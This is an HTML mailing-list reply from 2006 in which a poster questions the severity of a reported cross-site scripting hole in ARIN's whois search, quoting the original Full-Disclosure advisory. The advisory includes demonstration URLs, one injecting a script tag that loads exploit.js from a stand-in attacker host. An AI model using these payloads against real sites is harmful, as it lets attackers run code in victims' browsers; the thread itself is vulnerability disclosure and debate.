<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML dir=ltr><HEAD>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<META content="MSHTML 6.00.2900.2802" name=GENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=#ffffff>
<DIV><FONT face=Arial size=2>ok?</FONT></DIV>
<DIV><FONT face=Arial size=2></FONT> </DIV>
<DIV><FONT face=Arial size=2>So what exactly are you going to exploit
here? This site doesn't have any logins or even use cookies. Are you
going to trick a user into entering in a credit card number before they can
search the whois database?</FONT></DIV>
<DIV><FONT face=Arial size=2></FONT> </DIV>
<DIV><FONT face=Arial size=2>I think that XSS in many instances is a serious
issues. Many of the XSS issues reported on FD are rarely of much
consequence but could theoretically lead to a sessions hijack or tricking the
user into a fake login screen. However, in this instance I fail to see
what the point could possible be? If it is that you can simply run
javascript then so what? Close to 100% of any webhosting provider on the
internet will let you upload your own javascript. Might as well report
that geocities.com is vulnerable to XSS because you could upload an html file
with javascript on it.</FONT></DIV>
<DIV><FONT face=Arial size=2></FONT> </DIV>
<DIV><FONT face=Arial size=2>Anyway.. that's my take on this. Feel free to
correct me.. I don't mind.</FONT></DIV>
<DIV><FONT face=Arial size=2></FONT> </DIV>
<DIV><FONT face=Arial size=2>Steven</FONT></DIV>
<DIV><FONT face=Arial size=2></FONT> </DIV>
<DIV>----- Original Message ----- </DIV>
<BLOCKQUOTE
style="PADDING-RIGHT: 0px; PADDING-LEFT: 5px; MARGIN-LEFT: 5px; BORDER-LEFT: #000000 2px solid; MARGIN-RIGHT: 0px">
<DIV
style="BACKGROUND: #e4e4e4; FONT: 10pt arial; font-color: black"><B>From:</B>
<A title=Security@peadro.net href="mailto:Security@peadro.net">Terminal
Entry</A> </DIV>
<DIV style="FONT: 10pt arial"><B>To:</B> <A
title=full-disclosure@lists.grok.org.uk
href="mailto:full-disclosure@lists.grok.org.uk">Full Disclosure</A> ; <A
title=bugtraq@securityfocus.com href="mailto:bugtraq@securityfocus.com">Bug
Traq</A> </DIV>
<DIV style="FONT: 10pt arial"><B>Sent:</B> Thursday, March 02, 2006 11:17
PM</DIV>
<DIV style="FONT: 10pt arial"><B>Subject:</B> [Full-disclosure] Arin.net XSS
</DIV>
<DIV><BR></DIV>
<DIV><FONT face=Arial color=#000000 size=2><STRONG>Title</STRONG></FONT></DIV>
<DIV><FONT face=Arial color=#000000><FONT size=2><FONT face=Arial>ARIN.NET
input validation holes in "?queryinput=" allows remote users conduct
cross-site scripting attacks</FONT><BR></FONT></FONT></DIV>
<DIV><FONT face=Arial color=#000000><FONT
size=2><STRONG>Notification</STRONG><BR>Multiple attempts to contact Arin site
administrators went unanswered</FONT></FONT></DIV>
<DIV><FONT face=Arial color=#000000 size=2></FONT> </DIV>
<DIV><FONT size=2><FONT face=Arial><STRONG>Exploit
Included:</STRONG> Yes</FONT></FONT></DIV>
<DIV><FONT face=Arial size=2></FONT> </DIV>
<DIV><FONT face=Arial size=2><STRONG>Description</STRONG></FONT></DIV>
<DIV><FONT face=Arial color=#000000 size=2><FONT face=Arial size=2>The
"?queryinput=" script does not properly validate user-supplied input in
several parameters to filter HTML code. A remote user can create a specially
crafted URL that, when loaded by a target user, will cause arbitrary scripting
code to be executed by the target user's browser. </FONT><BR></FONT></DIV>
<DIV><FONT face=Arial color=#000000 size=2><FONT face=Arial size=2>Some
demonstration exploit URLs are provided:</FONT></FONT></DIV>
<DIV><FONT face=Arial color=#000000 size=2><A
href="http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E"
target=_blank>http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E</A><BR><A
href="http://ws.arin.net/whois/?queryinput=%3CSCRIPT+SRC%3Dhttp%3A%2F%2FmaliciousCode.net%2Fexploit.js%3E%3C%2FSCRIPT%3E"
target=_blank>http://ws.arin.net/whois/?queryinput=%3CSCRIPT+SRC%3Dhttp%3A%2F%2FmaliciousCode.net%2Fexploit.js%3E%3C%2FSCRIPT%3E</A><BR><A
href="http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E"
target=_blank>http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E</A></FONT></DIV>
<DIV><FONT face=Arial color=#000000 size=2><BR>Discovered by Terminal Entry
security [.at.] peadro (.)net<BR><BR></DIV></FONT><!--[object_id=#peadro.net#]-->
<P>
<HR>
<EM><FONT face=Arial size=2>This email and any files transmitted with it are
confidential and intended solely for the use of the individual or entity to
whom they are addressed. If you have received this email in error please
notify the system manager. This message contains confidential information and
is intended only for the individual named. If you are not the named addressee
you should not disseminate, distribute or copy this e-mail. Please notify the
sender immediately by e-mail if you have received this e-mail by mistake and
delete this e-mail from your system. If you are not the intended recipient you
are notified that disclosing, copying, distributing or taking any action in
reliance on the contents of this information is strictly
prohibited.</FONT></EM>
<P></P>
<P>
<HR>
<P></P>_______________________________________________<BR>Full-Disclosure - We
believe in it.<BR>Charter:
http://lists.grok.org.uk/full-disclosure-charter.html<BR>Hosted and sponsored
by Secunia - http://secunia.com/</BLOCKQUOTE></BODY></HTML>